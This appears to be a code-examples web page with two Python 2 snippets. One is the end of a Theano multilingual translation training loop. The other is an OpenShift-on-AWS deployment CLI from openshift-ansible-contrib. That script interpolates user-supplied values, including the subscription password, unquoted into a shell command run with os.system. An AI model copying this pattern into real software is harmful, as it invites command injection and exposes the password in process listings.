                                                     maxlen=maxlen,
                                                     maxlen_trg=maxlen_trg,
                                                    )

            if uidx == 1 or ( numpy.mod(uidx, pbatchFreq) == 0 and pbatchFreq != -1 ):
                pbatch_many(x, worddicts_r[0], n_x)

            if x is None:
                print 'Minibatch with zero sample under length ', maxlen
                uidx -= 1
                uidx = max(uidx, 0)
                continue

            n_samples += n_x

            # compute cost, grads and copy grads to shared variables

            if clip_c > 0:
                cost, not_finite, clipped = f_grad_shared(x, x_mask, y, y_mask)
            else:
                cost = f_grad_shared(x, x_mask, y, y_mask)

            if clipped:
                clipped_cnt += 1

            # check for bad numbers, usually we remove non-finite elements
            # and continue training - but not done here
            if numpy.isnan(cost) or numpy.isinf(cost):
                import ipdb
                ipdb.set_trace()
                NaN_cost_cnt += 1

            if not_finite:
                import ipdb
                ipdb.set_trace()
                NaN_grad_cnt += 1
                continue

            # do the update on parameters
            f_update(lrate)

            if numpy.isnan(cost) or numpy.isinf(cost):
                continue

            if float(NaN_grad_cnt) > max_epochs * 0.5 or float(NaN_cost_cnt) > max_epochs * 0.5:
                print 'Too many NaNs, abort training'
                return 1., 1., 1.

            # verbose
            if numpy.mod(uidx, dispFreq) == 0:
                ud = time.time() - ud_start
                wps = n_samples / float(time.time() - time0)
                print 'Epoch ', eidx, 'Update ', uidx, 'Cost ', cost, 'NaN_in_grad', NaN_grad_cnt,\
                      'NaN_in_cost', NaN_cost_cnt, 'Gradient_clipped', clipped_cnt, 'UD ', ud, "%.2f sentences/s" % wps
                ud_start = time.time()

            # generate some samples with the model and display them
            if numpy.mod(uidx, sampleFreq) == 0 and sampleFreq != -1:
                gen_list = [0, batch_size[0], batch_size[0]+batch_size[1],  batch_size[0]+batch_size[1]+batch_size[2]]
                gen_list = [ii for ii in gen_list if ii < n_x]

                for jj in gen_list:
                    # jj = min(5, n_samples)
                    stochastic = True
                    use_noise.set_value(0.)

                    # x : maxlen X n_samples
                    sample, score = gen_sample(tparams, f_init, f_next,
                                               x[:, jj][:, None],
                                               model_options, trng=trng, k=1,
                                               maxlen=maxlen_sample,
                                               stochastic=stochastic,
                                               argmax=False)
                    print
                    print 'Source ', jj, ': ',
                    if source_word_level:
                        for vv in x[:, jj]:
                            if vv == 0:
                                break
                            if vv in worddicts_r[0]:
                                if use_bpe:
                                    print (worddicts_r[0][vv]).replace('@@', ''),
                                else:
                                    print worddicts_r[0][vv],
                            else:
                                print 'UNK',
                        print
                    else:
                        source_ = []
                        for ii, vv in enumerate(x[:, jj]):
                            if vv == 0 or vv == 2 or vv == 3:
                                continue

                            if vv in worddicts_r[0]:
                                source_.append(worddicts_r[0][vv])
                            else:
                                source_.append('UNK')
                        print "".join(source_)
                    print 'Truth ', jj, ' : ',
                    if target_word_level:
                        for vv in y[:, jj]:
                            if vv == 0:
                                break
                            if vv in worddicts_r[1]:
                                if use_bpe:
                                    print (worddicts_r[1][vv]).replace('@@', ''),
                                else:
                                    print worddicts_r[1][vv],
                            else:
                                print 'UNK',
                        print
                    else:
                        truth_ = []
                        for vv in y[:, jj]:
                            if vv == 0:
                                break
                            if vv in worddicts_r[1]:
                                truth_.append(worddicts_r[1][vv])
                            else:
                                truth_.append('UNK')
                        print "".join(truth_)
                    print 'Sample ', jj, ': ',
                    if stochastic:
                        ss = sample
                    else:
                        score = score / numpy.array([len(s) for s in sample])
                        ss = sample[score.argmin()]
                    if target_word_level:
                        for vv in ss:
                            if vv == 0:
                                break
                            if vv in worddicts_r[1]:
                                if use_bpe:
                                    print (worddicts_r[1][vv]).replace('@@', ''),
                                else:
                                    print worddicts_r[1][vv],
                            else:
                                print 'UNK',
                        print
                    else:
                        sample_ = []
                        for vv in ss:
                            if vv == 0:
                                break
                            if vv in worddicts_r[1]:
                                sample_.append(worddicts_r[1][vv])
                            else:
                                sample_.append('UNK')
                        print "".join(sample_)
                    print

            # validate model on validation set and early stop if necessary
            if numpy.mod(uidx, validFreq) == 0:
                valid_scores = []
                for ii, vv in enumerate(valid):
                    use_noise.set_value(0.)

                    valid_errs = pred_probs(f_log_probs,
                                            prepare_data,
                                            model_options,
                                            vv,
                                            pool_stride,
                                            verboseFreq=verboseFreq,
                                           )
                    valid_err = valid_errs.mean()
                    valid_scores.append(valid_err)
                    history_errs[ii].append(valid_err)

                    # patience == -1, never happens
                    if len(history_errs[ii]) > patience and valid_err >= \
                            numpy.array(history_errs[ii])[:-patience].min() and patience != -1:
                        bad_counter += 1
                        if bad_counter > patience:
                            print 'Early Stop!'
                            estop = True
                            break

                    if numpy.isnan(valid_err):
                        import ipdb
                        ipdb.set_trace()

                cnt = 0
                for ii in xrange(4):
                    if uidx == 0 or valid_scores[ii] <= numpy.array(history_errs[ii]).min():
                        cnt += 1 # cnt : the number of language pairs whose negative-log-likelihood increased this epoch.

                if cnt >= 2:
                    best_p = unzip(tparams)
                    best_optp = unzip(toptparams)
                    bad_counter = 0

                if saveFreq != validFreq and save_best_models:
                    numpy.savez(best_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                                cidx=cdix, **best_p)
                    numpy.savez(best_opt_file_name, **best_optp)

                print 'Valid : DE {}\t CS {}\t FI {}\t RU {}'.format(valid_scores[0], valid_scores[1], valid_scores[2], valid_scores[3])

            # save the best model so far
            if numpy.mod(uidx, saveFreq) == 0:
                print 'Saving...',

                if not os.path.exists(model_path):
                    os.mkdir(model_path)

                params = unzip(tparams)
                optparams = unzip(toptparams)
                numpy.savez(file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                            cidx=cidx, **params)
                numpy.savez(opt_file_name, **optparams)

                if save_every_saveFreq and (uidx >= save_burn_in):
                    this_file_name = '%s%s.%d.npz' % (model_path, save_file_name, uidx)
                    this_opt_file_name = '%s%s%s.%d.npz' % (model_path, save_file_name, '.grads', uidx)
                    numpy.savez(this_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                                cidx=cidx, **params)
                    numpy.savez(this_opt_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                                cidx=cidx, **params)
                    if best_p is not None and saveFreq != validFreq:
                        this_best_file_name = '%s%s.%d.best.npz' % (model_path, save_file_name, uidx)
                        numpy.savez(this_best_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                                    cidx=cidx, **best_p)
                print 'Done...',
                print 'Saved to %s' % file_name

            # finish after this many updates
            if uidx >= finish_after and finish_after != -1:
                print 'Finishing after %d iterations!' % uidx
                estop = True
                break

        print 'Seen %d samples' % n_samples
        lang_nos = (4535523, 12122376, 1926115, 2326893)
        lang_done = [x * update_idx for x in batch_size]
        lang_rem = [x - y for x,y in zip(lang_nos, lang_done)]
        print "Remaining : DE({}), CS({}), FI({}), RU({})".format(lang_rem[0], lang_rem[1], lang_rem[2], lang_rem[3])
        eidx += 1

        if estop:
            break

    use_noise.set_value(0.)

    valid_scores = []
    for ii, vv in enumerate(valid):

        valid_err = pred_probs(f_log_probs,
                               prepare_data,
                               model_options,
                               vv,
                               pool_stride,
                              ).mean()
        valid_scores.append(valid_err)

    print 'Valid : DE {}\t CS {}\t FI {}\t RU {}'.format(valid_scores[0], valid_scores[1], valid_scores[2], valid_scores[3])

    params = unzip(tparams)
    optparams = unzip(toptparams)
    file_name = '%s%s.%d.npz' % (model_path, save_file_name, uidx)
    opt_file_name = '%s%s%s.%d.npz' % (model_path, save_file_name, '.grads', uidx)
    numpy.savez(file_name, history_errs=history_errs, uidx=uidx, eidx=eidx, cidx=cidx, **params)
    numpy.savez(opt_file_name, **optparams)
    if best_p is not None and saveFreq != validFreq:
        best_file_name = '%s%s.%d.best.npz' % (model_path, save_file_name, uidx)
        best_opt_file_name = '%s%s%s.%d.best.npz' % (model_path, save_file_name, '.grads',uidx)
        numpy.savez(best_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx, cidx=cidx, **best_p)
        numpy.savez(best_opt_file_name, **best_optp)

    return valid_err

Example 175

Project: openshift-ansible-contrib Source File: ose-on-aws.py
@click.command()

### Cluster options
@click.option('--stack-name', default='openshift-infra', help='Cloudformation stack name. Must be unique',
              show_default=True)
@click.option('--console-port', default='443', type=click.IntRange(1,65535), help='OpenShift web console port',
              show_default=True)
@click.option('--deployment-type', default='openshift-enterprise', help='OpenShift deployment type',
              show_default=True)

### AWS/EC2 options
@click.option('--region', default='us-east-1', help='ec2 region',
              show_default=True)
@click.option('--ami', default='ami-10251c7a', help='ec2 ami',
              show_default=True)
@click.option('--master-instance-type', default='m4.large', help='ec2 instance type',
              show_default=True)
@click.option('--node-instance-type', default='t2.medium', help='ec2 instance type',
              show_default=True)
@click.option('--app-instance-type', default='t2.medium', help='ec2 instance type',
              show_default=True)
@click.option('--bastion-instance-type', default='t2.micro', help='ec2 instance type',
              show_default=True)
@click.option('--keypair', help='ec2 keypair name',
              show_default=True)
@click.option('--create-key', default='no', help='Create SSH keypair',
              show_default=True)
@click.option('--key-path', default='/dev/null', help='Path to SSH public key. Default is /dev/null which will skip the step',
              show_default=True)
@click.option('--create-vpc', default='yes', help='Create VPC',
              show_default=True)
@click.option('--vpc-id', help='Specify an already existing VPC',
              show_default=True)
@click.option('--private-subnet-id1', help='Specify a Private subnet within the existing VPC',
              show_default=True)
@click.option('--private-subnet-id2', help='Specify a Private subnet within the existing VPC',
              show_default=True)
@click.option('--private-subnet-id3', help='Specify a Private subnet within the existing VPC',
              show_default=True)
@click.option('--public-subnet-id1', help='Specify a Public subnet within the existing VPC',
              show_default=True)
@click.option('--public-subnet-id2', help='Specify a Public subnet within the existing VPC',
              show_default=True)
@click.option('--public-subnet-id3', help='Specify a Public subnet within the existing VPC',
              show_default=True)

### DNS options
@click.option('--public-hosted-zone', help='hosted zone for accessing the environment')
@click.option('--app-dns-prefix', default='apps', help='application dns prefix',
              show_default=True)

### Subscription and Software options
@click.option('--rhsm-user', help='Red Hat Subscription Management User')
@click.option('--rhsm-password', help='Red Hat Subscription Management Password',
                hide_input=True,)
@click.option('--rhsm-pool', help='Red Hat Subscription Management Pool ID or Subscription Name')

### Miscellaneous options
@click.option('--byo-bastion', default='no', help='skip bastion install when one exists within the cloud provider',
              show_default=True)
@click.option('--bastion-sg', default='/dev/null', help='Specify Bastion Security group used with byo-bastion',
              show_default=True)
@click.option('--containerized', default='False', help='Containerized installation of OpenShift',
              show_default=True)
@click.option('--s3-bucket-name', help='Bucket name for S3 for registry')
@click.option('--s3-username', help='S3 user for registry access')
@click.option('--no-confirm', is_flag=True,
              help='Skip confirmation prompt')
@click.help_option('--help', '-h')
@click.option('-v', '--verbose', count=True)

def launch_refarch_env(region=None,
                    stack_name=None,
                    ami=None,
                    no_confirm=False,
                    master_instance_type=None,
                    node_instance_type=None,
                    app_instance_type=None,
                    bastion_instance_type=None,
                    keypair=None,
                    create_key=None,
                    key_path=None,
                    create_vpc=None,
                    vpc_id=None,
                    private_subnet_id1=None,
                    private_subnet_id2=None,
                    private_subnet_id3=None,
                    public_subnet_id1=None,
                    public_subnet_id2=None,
                    public_subnet_id3=None,
                    byo_bastion=None,
                    bastion_sg=None,
                    public_hosted_zone=None,
                    app_dns_prefix=None,
                    deployment_type=None,
                    console_port=443,
                    rhsm_user=None,
                    rhsm_password=None,
                    rhsm_pool=None,
                    containerized=None,
                    s3_bucket_name=None,
                    s3_username=None,
                    verbose=0):

  # Need to prompt for the R53 zone:
  if public_hosted_zone is None:
    public_hosted_zone = click.prompt('Hosted DNS zone for accessing the environment')


  if s3_bucket_name is None:
    s3_bucket_name = stack_name + '-ocp-registry-' + public_hosted_zone.split('.')[0]

  if s3_username is None:
    s3_username = stack_name + '-s3-openshift-user'

  # Create ssh key pair in AWS if none is specified
  if create_key in 'yes' and key_path in 'no':
    key_path = click.prompt('Specify path for ssh public key')
    keypair = click.prompt('Specify a name for the keypair')

 # If no keypair is not specified fail:
  if keypair is None and create_key in 'no':
    click.echo('A SSH keypair must be specified or created')
    sys.exit(1)

 # Name the keypair if a path is defined
  if keypair is None and create_key in 'yes':
    keypair = click.prompt('Specify a name for the keypair')

 # If no subnets are defined prompt:
  if create_vpc in 'no' and vpc_id is None:
    vpc_id = click.prompt('Specify the VPC ID')

 # If no subnets are defined prompt:
  if create_vpc in 'no' and private_subnet_id1 is None:
    private_subnet_id1 = click.prompt('Specify the first Private subnet within the existing VPC')
    private_subnet_id2 = click.prompt('Specify the second Private subnet within the existing VPC')
    private_subnet_id3 = click.prompt('Specify the third Private subnet within the existing VPC')
    public_subnet_id1 = click.prompt('Specify the first Public subnet within the existing VPC')
    public_subnet_id2 = click.prompt('Specify the second Public subnet within the existing VPC')
    public_subnet_id3 = click.prompt('Specify the third Public subnet within the existing VPC')

 # Prompt for Bastion SG if byo-bastion specified
  if byo_bastion in 'yes' and bastion_sg in '/dev/null':
    bastion_sg = click.prompt('Specify the the Bastion Security group(example: sg-4afdd24)')
  

  # If the user already provided values, don't bother asking again
  if deployment_type in ['openshift-enterprise'] and rhsm_user is None:
    rhsm_user = click.prompt("RHSM username?")
  if deployment_type in ['openshift-enterprise'] and rhsm_password is None:
    rhsm_password = click.prompt("RHSM password?", hide_input=True)
  if deployment_type in ['openshift-enterprise'] and rhsm_pool is None:
    rhsm_pool = click.prompt("RHSM Pool ID or Subscription Name?")

  # Calculate various DNS values
  wildcard_zone="%s.%s" % (app_dns_prefix, public_hosted_zone)

  # Display information to the user about their choices
  click.echo('Configured values:')
  click.echo('\tstack_name: %s' % stack_name)
  click.echo('\tami: %s' % ami)
  click.echo('\tregion: %s' % region)
  click.echo('\tmaster_instance_type: %s' % master_instance_type)
  click.echo('\tnode_instance_type: %s' % node_instance_type)
  click.echo('\tapp_instance_type: %s' % app_instance_type)
  click.echo('\tbastion_instance_type: %s' % bastion_instance_type)
  click.echo('\tkeypair: %s' % keypair)
  click.echo('\tcreate_key: %s' % create_key)
  click.echo('\tkey_path: %s' % key_path)
  click.echo('\tcreate_vpc: %s' % create_vpc)
  click.echo('\tvpc_id: %s' % vpc_id)
  click.echo('\tprivate_subnet_id1: %s' % private_subnet_id1)
  click.echo('\tprivate_subnet_id2: %s' % private_subnet_id2)
  click.echo('\tprivate_subnet_id3: %s' % private_subnet_id3)
  click.echo('\tpublic_subnet_id1: %s' % public_subnet_id1)
  click.echo('\tpublic_subnet_id2: %s' % public_subnet_id2)
  click.echo('\tpublic_subnet_id3: %s' % public_subnet_id3)
  click.echo('\tbyo_bastion: %s' % byo_bastion)
  click.echo('\tbastion_sg: %s' % bastion_sg)
  click.echo('\tconsole port: %s' % console_port)
  click.echo('\tdeployment_type: %s' % deployment_type)
  click.echo('\tpublic_hosted_zone: %s' % public_hosted_zone)
  click.echo('\tapp_dns_prefix: %s' % app_dns_prefix)
  click.echo('\tapps_dns: %s' % wildcard_zone)
  click.echo('\trhsm_user: %s' % rhsm_user)
  click.echo('\trhsm_password: cuem***')
  click.echo('\trhsm_pool: %s' % rhsm_pool)
  click.echo('\tcontainerized: %s' % containerized)
  click.echo('\ts3_bucket_name: %s' % s3_bucket_name)
  click.echo('\ts3_username: %s' % s3_username)
  click.echo("")

  if not no_confirm:
    click.confirm('Continue using these values?', abort=True)

  playbooks = ['playbooks/infrastructure.yaml', 'playbooks/openshift-install.yaml']

  for playbook in playbooks:

    # hide cache output unless in verbose mode
    devnull='> /dev/null'

    if verbose > 0:
      devnull=''

    # refresh the inventory cache to prevent stale hosts from
    # interferring with re-running
    command='inventory/aws/hosts/ec2.py --refresh-cache %s' % (devnull)
    os.system(command)

    # remove any cached facts to prevent stale data during a re-run
    command='rm -rf .ansible/cached_facts'
    os.system(command)

    command='ansible-playbook -i inventory/aws/hosts -e \'region=%s \
    stack_name=%s \
    ami=%s \
    keypair=%s \
    create_key=%s \
    key_path=%s \
    create_vpc=%s \
    vpc_id=%s \
    private_subnet_id1=%s \
    private_subnet_id2=%s \
    private_subnet_id3=%s \
    public_subnet_id1=%s \
    public_subnet_id2=%s \
    public_subnet_id3=%s \
    byo_bastion=%s \
    bastion_sg=%s \
    master_instance_type=%s \
    node_instance_type=%s \
    app_instance_type=%s \
    bastion_instance_type=%s \
    public_hosted_zone=%s \
    wildcard_zone=%s \
    console_port=%s \
    deployment_type=%s \
    rhsm_user=%s \
    rhsm_password=%s \
    rhsm_pool=%s \
    containerized=%s \
    s3_bucket_name=%s \
    s3_username=%s \' %s' % (region,
                    stack_name,
                    ami,
                    keypair,
                    create_key,
                    key_path,
                    create_vpc,
                    vpc_id,
                    private_subnet_id1,
                    private_subnet_id2,
                    private_subnet_id3,
                    public_subnet_id1,
                    public_subnet_id2,
                    public_subnet_id3,
                    byo_bastion,
                    bastion_sg,
                    master_instance_type,
                    node_instance_type,
                    app_instance_type,
                    bastion_instance_type,
                    public_hosted_zone,
                    wildcard_zone,
                    console_port,
                    deployment_type,
                    rhsm_user,
                    rhsm_password,
                    rhsm_pool,
                    containerized,
                    s3_bucket_name,
                    s3_username,
                    playbook)

    if verbose > 0:
      command += " -" + "".join(['v']*verbose)
      click.echo('We are running: %s' % command)

    status = os.system(command)
    if os.WIFEXITED(status) and os.WEXITSTATUS(status) != 0:
      sys.exit(os.WEXITSTATUS(status))
See More Examples - Go to Next Page
Page 1 Page 2 Page 3 Page 4 Selected